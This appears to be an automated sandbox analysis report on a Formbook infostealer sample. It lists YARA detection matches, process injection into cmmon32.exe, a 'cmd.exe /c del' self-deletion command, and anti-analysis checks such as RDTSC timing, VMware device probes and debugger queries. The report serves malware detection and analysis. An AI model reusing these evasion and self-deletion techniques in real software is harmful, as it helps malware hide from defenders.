          Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@12/6
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404356
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,0_2_00402020
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587D72 FindResourceA,9_2_04587D72
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_01
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile created: C:\Users\user\AppData\Local\Temp\nsyA3E2.tmpJump to behavior
          Source: UGGJ4NnzFz.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: UGGJ4NnzFz.exeVirustotal: Detection: 29%
          Source: UGGJ4NnzFz.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile read: C:\Users\user\Desktop\UGGJ4NnzFz.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\UGGJ4NnzFz.exe 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess created: C:\Users\user\Desktop\UGGJ4NnzFz.exe 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess created: C:\Users\user\Desktop\UGGJ4NnzFz.exe 'C:\Users\user\Desktop\UGGJ4NnzFz.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'Jump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: cmmon32.pdb source: UGGJ4NnzFz.exe, 00000001.00000002.274327095.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: UGGJ4NnzFz.exe, 00000001.00000002.274327095.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: UGGJ4NnzFz.exe, 00000000.00000003.212550994.0000000009A50000.00000004.00000001.sdmp, UGGJ4NnzFz.exe, 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, cmmon32.exe, 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: UGGJ4NnzFz.exe, cmmon32.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeUnpacked PE file: 1.2.UGGJ4NnzFz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_73752F60 push eax; ret 0_2_73752F8E
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00416026 push ebx; iretd 1_2_00416027
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041C087 push dword ptr [DF0C81F8h]; ret 1_2_0041C1C4
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00409A94 push 00D6BDC6h; iretd 1_2_00409A99
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041B46C push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041B402 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041B40B push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009ED0D1 push ecx; ret 1_2_009ED0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045CD0D1 push ecx; ret 9_2_045CD0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B6026 push ebx; iretd 9_2_003B6027
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BC087 push dword ptr [DF0C81F8h]; ret 9_2_003BC1C4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003A9A94 push 00D6BDC6h; iretd 9_2_003A9A99
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BB3B5 push eax; ret 9_2_003BB408
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BB40B push eax; ret 9_2_003BB472
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BB402 push eax; ret 9_2_003BB408
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BB46C push eax; ret 9_2_003BB472
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile created: C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000003A85E4 second address: 00000000003A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000003A897E second address: 00000000003A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeAPI coverage: 8.1 %
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 8.6 %
          Source: C:\Windows\explorer.exe TID: 6164Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6984Thread sleep time: -44000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\Desktop\UGGJ4NnzFz.exeJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyA3E3.tmpJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\dceotuvjnitpzJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\6jlp0t221b5inmotwb6Jump to behavior
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.222167961.0000000001398000.00000004.00000020.sdmpBinary or memory string: War&Prod_VMware_SATAR
          Source: explorer.exe, 00000005.00000000.247174427.000000000F6E3000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.240796692.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.239093563.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.252370895.0000000001398000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000005.00000000.232477567.0000000004E61000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAv
          Source: explorer.exe, 00000005.00000000.261705438.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.242412172.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000000.261725875.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.239093563.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.239093563.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.239093563.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeAPI call chain: ExitProcess graph end nodegraph_0-4364
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeAPI call chain: ExitProcess graph end nodegraph_0-4360
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00409B20 LdrLoadDll,1_2_00409B20
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999080 mov eax, dword ptr fs:[00000030h]1_2_00999080
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CF0BF mov ecx, dword ptr fs:[00000030h]1_2_009CF0BF
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]1_2_009CF0BF
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]1_2_009CF0BF
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]1_2_00A13884
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]1_2_00A13884
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D90AF mov eax, dword ptr fs:[00000030h]1_2_009D90AF
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]1_2_009C20A0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]1_2_009C20A0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]1_2_009C20A0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]1_2_009C20A0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]1_2_009C20A0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]1_2_009C20A0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009958EC mov eax, dword ptr fs:[00000030h]1_2_009958EC
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]1_2_009940E1
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]1_2_009940E1
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]1_2_009940E1
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB8E4 mov eax, dword ptr fs:[00000030h]1_2_009BB8E4
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB8E4 mov eax, dword ptr fs:[00000030h]1_2_009BB8E4
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]1_2_009BA830
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]1_2_009BA830
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]1_2_009BA830
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]1_2_009BA830
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]1_2_009AB02A
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]1_2_009AB02A
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]1_2_009AB02A
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]1_2_009AB02A
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]1_2_009C002D
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]1_2_009C002D
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]1_2_009C002D
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]1_2_009C002D
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]1_2_009C002D
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]1_2_00A64015
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]1_2_00A64015
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]1_2_00A17016
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]1_2_00A17016
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]1_2_00A17016
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]1_2_009B0050
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]1_2_009B0050
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A61074 mov eax, dword ptr fs:[00000030h]1_2_00A61074
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A52073 mov eax, dword ptr fs:[00000030h]1_2_00A52073
